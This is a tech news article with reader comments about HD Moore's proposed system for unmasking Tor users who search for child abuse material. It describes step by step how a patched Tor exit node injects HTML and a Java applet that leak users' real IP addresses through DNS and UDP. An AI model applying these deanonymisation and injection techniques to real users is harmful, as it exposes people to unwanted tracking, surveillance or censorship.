Hacker builds tracking system to nab Tor pedophiles

Hacker builds tracking system to nab Tor pedophiles

Summary: Amidst concerns that pedophiles are using public Tor (the Onion Router) servers to trade in child pornography, über-hacker HD Moore is building a tracking system capable of pinpointing specific workstations that searched for and downloaded sexual images and videos of kids.

SHARE:
27

Amidst concerns that pedophiles are using public Tor (the Onion Router) servers to trade in child pornography, über-hacker HD Moore is building a tracking system capable of pinpointing specific workstations that searched for and downloaded sexual images and videos of kids.

Moore, the brains behind the Metasploit Project, has come up with a series of countermeasures that include using patched Tor servers and a decloaking engine to detect the exact location of a pedophile within an organization or residence.

HD MooreMoore first discussed his "countermeasures" at a meeting of the Austin Hackers Association (AHA) last summer when it became clear that the EFF-backed anonymity/privacy network was being used for the most nefarious purposes. Further confirmation came last September when German authorities cracked down on Tor node operators because of the proliferation of child porn.

In an e-mail interview, Moore said the plan is to release the source code, which will allow anyone to run a patched Tor server to help pinpoint pedophiles online.

Moore's description of the countermeasures:

1. Run a patched TOR server. The patches embed a Ruby interpreter into the TOR connection engine and allow arbitrary Ruby scripts to process data before sending it back to the client.

2. When child porn-related keywords are seen (either the Web request, or the response), inject a little extra HTML code into the response going back to the Web browser. This HTML code would connect to my decloaking engine.

3. The decloak engine is based on the following techniques:

a) A unique identifier is created to track this user.

b) The browser is asked to resolve a unique host name, containing the identifier, that is part of a special domain hosted on my server. I run a modified DNS server that updates a database with the address from which the DNS request is received. The goal of this step is to determine the ISP of the user.

c) The browser is asked to load a Java applet. This applet uses two different techniques to obtain information about the user.

d) The first method uses the Java API to determine the local IP address of the user. This value is then passed back to the JavaScript code in the Web HTML snippet hosting the applet. The goal of this step is to get the real *internal* IP address of the user.

e) The second method involves the applet sending a raw DNS packet, directly to my server. Since this is UDP, it does not pass through TOR, and since it is sent by the Java code, it does not go through the ISP. This packet contains the unique identifier and if received, gives away the real *external* IP of the user. The goal of this step is to get the address of the user's NAT gateway.

f) At this point, my server is able to determine the internal address of the user, the external address from which they access the internet, and the ISP they use to provide DNS resolution, as well as the IP address they come from through the TOR network. This information, along with the unique tracking ID, allows me to identify a specific workstation within an organization or residence.

As to whether this is enough for law enforcement authorities to make an arrest and build a case, Moore's answer: "No idea."

Topics: Networking, Security, Servers

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Talkback

27 comments
Log in or register to join the discussion
  • An arrest should be imminent

    "As to whether this is enough for law enforcement authorities to make an arrest and build a case, Moore's answer: "No idea.""

    Sounds like what Moore is doing is pretty clearly illegal. If he is in fact doing what he claims then law enforcemnt should have enough to arrest him. Pretty ballsy of him to be bragging about his exploits to the press.
    sweklaweklfwe@...
    • You even understand what's going on?

      HD is writing software that can help catch child pornographers. It's not up to him to install the monitoring software, he's only providing the software.
      georgeou
      • Do you understand?

        Ok my, he is "saving the children". Uh huh, as if the tech won't be used for a thousand other things.
        No_Ax_to_Grind
        • You are right on

          The govt will look for searches with "bomb" and "airlines". Hollywood will subpoena to look for anything copyrighted.

          Honestly, writing software like this is not really not that difficult. Especially when the writer is writing both client and server pieces. The only surprise is that we haven't heard about software like this before now.
          Taz_z
        • That's the tradeoff, anything can be abused

          There is no simple solution to the problem. If you have true anonymity, you're going to have child pornographers abusing it. If you implement tracking technology, it COULD be abused for other things. Then again, what makes you think you're untraceable even if they didn't implement HD Moore's software?
          georgeou
    • RE: Hacker builds tracking system to nab Tor pedophiles

      @sweklaweklfwe@... yep, you are right. What is behind BS this article pushes to us - he proposes to create fake Tor package by injecting malicious code into it. In the other words - a trojan.
      Win8AnUglyDisaster
  • His method is flawed and doesn't work!!!

    First, check out JanusVM (http://janusvm.peertech.org) which has been out since late May 2006, long before this "exploit" was published.

    Check out the metasploit site for the bypass "exploit" test.
    http://metasploit.com/research/misc/decloak/

    We don't have this problem with JanusVM.
    I use Java, Javascript, and Flash all the time, and don't have this issue.

    I tested it with ( JanusVM + IE 7.0 ) and ( JanusVM + Firefox).
    NO PROBLEMS.

    "Moore's description of the countermeasures:

    1. Run a patched TOR server. The patches embed a Ruby interpreter into the TOR connection engine and allow arbitrary Ruby scripts to process data before sending it back to the client."

    2. When child porn-related keywords are seen (either the Web request, or the response), inject a little extra HTML code into the response going back to the Web browser. This HTML code would connect to my decloaking engine.

    3. The decloak engine is based on the following techniques:

    a) A unique identifier is created to track this user.

    b) The browser is asked to resolve a unique host name, containing the identifier, that is part of a special domain hosted on my server. I run a modified DNS server that updates a database with the address from which the DNS request is received. The goal of this step is to determine the ISP of the user."

    ** JanusVM redirects all DNS request through Tor IF (and ONLY IF) the DNS server is not in the same LAN / netmask. I created TORSEC.exe with the last release of JanusVM and this checks for this "DNS leak" issue and corrects it. Then when the VPN disconnects (in Windows) it restores the DNS back to what it was before the VPN to the VM is established. DNS Problem solved. **

    "c) The browser is asked to load a Java applet. This applet uses two different techniques to obtain information about the user.

    d) The first method uses the Java API to determine the local IP address of the user. This value is then passed back to the JavaScript code in the Web HTML snippet hosting the applet. The goal of this step is to get the real *internal* IP address of the user."

    ** This will come back as either 10.10.10.X, not the TRUE internal IP of the LAN or the ISP. Instead, it picks up the default IP of the VPN interface to the VM. **

    "e) The second method involves the applet sending a raw DNS packet, directly to my server. Since this is UDP, it does not pass through TOR, and since it is sent by the Java code, it does not go through the ISP [DNS server]. This packet contains the unique identifier and if received, gives away the real *external* IP of the user. The goal of this step is to get the address of the user's NAT gateway."

    ** Again, DNS request are redirected through Tor (dns-proxy-tor) when setup correctly. This is funny! Because his DNS request is going to HIS server, and not the internal DNS server of the interface (probably assigned by DHCP to 192.168.1.1 or something with the ISP), it is going to hit the iptables rule and get routed through Tor when using JanusVM. Thank you! His applet just did EXACTLY what needs to be done to ensure the DNS request are not being leaked with JanusVM, even if the user forgot to set an external DNS IP themselves or didn't run TORSEC.exe. His applet just broke itself behind JanusVM, and I don't think this was result he intended... **

    "f) At this point, my server is able to determine the internal address of the user, the external address from which they access the internet, and the ISP they use to provide DNS resolution, as well as the IP address they come from through the TOR network. This information, along with the unique tracking ID, allows me to identify a specific workstation within an organization or residence."

    ** Not when I tested it.

    Again, JanusVM drops all ICMP, UDP, etc. and only allows TCP connections and DNS request through Tor.

    This is a really cool trick this guy is doing, but if anything, it helps proof the point that when you don't implement and use a tool correctly, you can't expect the best results.
    (Sorry Moore ;)

    Don't get me wrong, I'm all about catching pedophiles, but you're not going to be able to do it this way. Personally, I like the way MSNBC does it with "To Catch a Predator". The idea of catching pedophiles is great, but not practical when wanting a true anonymous system.

    So, Tor works great when IMPLEMENTED correctly.

    Use JanusVM. End of Story.

    Kyle Williams
    JanusVM Lead Developer
    janusvm.peertech.org
    JanusVM
    • Actually, the basic premise does work

      That is basically how website visitors get tracked. The visitors execute some html or javascript in their web browsers that passes a request to another server with some identifying information so the visitor can be associated with the web site. That other server sees the external IP address of that visitor. In this case, the javascript is built dynamically when the search criteria is analyzed. If the visitor has cookies enabled, then he/she can be tracked across other Tor servers if he/she has a different IP address, like through a VPN.

      Nice promo for JanusVM though, and it didn't cost you a cent.
      Taz_z
      • :)

        "Nice promo for JanusVM though, and it didn't cost you a cent."

        :)
        JanusVM
      • Re: Actually, the basic premise does work

        lol
        You haven't used JanusVM before, have you? It's a free, non-commercial Tor client that basically VPNizes your whole net connection. Since HD Moore's methods depend on tricking your browser into using your "real" IP for making some requests, it will never work with JanusVM, because all IP traffic, regardless of protocol is intercepted and routed through Tor.

        The point here is that Moore is claiming to be defeating Tor, when he's really just exploiting misconfigured Tor clients. None of the attacks that he proposes compromise the Tor network/protocol itself. Considering what an amazing security researcher he is, it'd be nice if he'd put his effort into exposing real exploits in the Tor network instead of scoring cheap media points.

        The only exploit I can think of is to use malicious Java/Javascript/ActiveX code (or even a browser buffer overflow) to alter files on the client's local system - for example, altering the default home page - so that in the future if the user uses that browser without JanusVM, they're linked to their real IP. That, however, would require using malicious Java code to exploit the client, and would be illegal and fairly unarguably unethical in itself. Doesn't mean that a government or similarly powerful institution wouldn't be willing to do it though...

        The solution to this danger for the super-paranoid is of course to set aside a machine (or virtual machine) which always runs JanusVM and thus is "permanently anonymized".
        Someguy2
  • Message has been deleted.

    Reverend MacFellow
    • Only if he is looking at ...

      ... naked pictures of you. Your post was extremely childish!
      ShadeTree
  • The whole point of anonymous software is so people can do whatever they ..

    WANT. yes, pedophiles are bad, but when you want to have a system that keeps you anonymous, this is going to happen. The whole point of onion routers is to protect the person on the other end. Hence onion, mulitple layers on distraction and redirection between you and the end point.

    They should of thought about this before they created the software. You can be sure that people are using this software for more than just pedo stuff, hacking, criminal activities that involve fraud to the holy grail(atm)... terrorism.

    Yeap, it sucks, but when your anonymous, you find out who you really are.
    Been_Done_Before
  • Thanks from Communist China, etc.

    What makes you think no one but people trying to catch child porn violaters will use this method? If the TOR server can be patched to check for child porn related words it can be patched for terrorism-related words, governmental censorship, industrial espionage, insider-trading, extortion and loads of other criminal purposes. And the people carrying out those activities have the finances and expertise to do it now that the details have been revealed.

    Also, loading Java or other programs that send data without the person's permission probably violates state and/or federal criminal and civil laws against unauthorized access to a computer. The fact that the person has Java enabled does not automatically constitute permission to access [i]any[/i] information on the computer and send it wherever. Hacking the server to access the data in ways the system is not intended could violate federal laws against wiretapping. Someone using this software could face criminal hacking charges or a massive civil lawsuit if information was given out about someone and that person was not actually convicted.

    (And, yes, I am an attorney, licensed in Texas.)
    Rick_R
    • Reality check.

      Any technique can be used by anyone. How can you be sure that this type of analysis doesn't already happen in "Communist China"?
      sweklaweklfwe@...
    • Inadissable Evidence?

      Let me see if I understand you correctly: are you implying that if a US law enforcement agence _were_ to use Moore's technique, the evidence would be inadmissable in court?

      Then in addition, the perp would risk the criminal hacking charges and or civil lawsuit, since with only inadmissable evidene, a conviction would be unlikely.
      mejohnsn
  • Yes, this account...

    Is provided by BugMeNot, call it 'anonymous' =-)
    sweklaweklfwe@...
  • Different values

    The big questions to ask are:

    "Should the U.S. be enforcing and promoting U.S. values on the rest of the world's people?"

    and

    "At what point does the prevention of sexual exploitation of a child outweigh the protection of a person's right to privacy and free speech?"

    or more specifically

    "At what point does the rights of a child in a 3rd world nation outweigh the rights of a U.S. citizen?"

    This is a case of where you CAN'T have your cake and eat it too. Personally, I vote for privacy and free speech rights. It's my responsibility to take care of my kids. It's not anyone else's responsibility. And it's not my responsibility to take care of anyone else's kids. You people who want this kind of monitoring capability either haven't read 1984, or you must want to have just such an intolerable system to live in.

    As repulsive as I and most other Americans may find child pornography and sexual exploitation, there have been periods of time historically in other countries when such behavior was an accepted norm. And this is still considered an accepted norm in some countries today, inspite of lip service to American crusaders. But since we can't even agree on when a person is a child or an adult here in the U.S.; we're never going to be able to resolve this on a world-wide basis. Is it when a person reaches 13? Is a person no longer a child once they become sexually mature enough to father a child or carry one to term? Is it 14,15,16,17,18,21,22,24, or 25 years of age?

    If "adulthood" is a question of cognitive ability, then there are a lot of physically mature humans that never become adults.

    Of course if the condition of being "human" is a question of cognitive ability, then there sure are a lot of people in the world who aren't human.
    Dr_Zinj
  • seriously...

    only a fool enables any scripts when using TOR or anything else.

    noscript for the win!
    ZDNET_guest666
  • RE: Hacker builds tracking system to nab Tor pedophiles

    As a concept this is nothing new, interception,tagging and tracing. It's as old as the internet.

    What I find alarming is that this uses the lowest common denominator (to rile people up) to justify techniques that most people (if not under the veil of Pedo tracking) would find totally unacceptable.

    If implemented this can be too easily exploited for any keywords.

    Not like George Bush?

    Search for like minded people who don't like him either and end up with the FBI at your door.

    OK so that is a joke example, but on a serious note this is really what this represents, Removing Privacy to openly have freedom of speech, so lets stop trying to hide it under the veil of pedo tracing techniques.
    13thHouR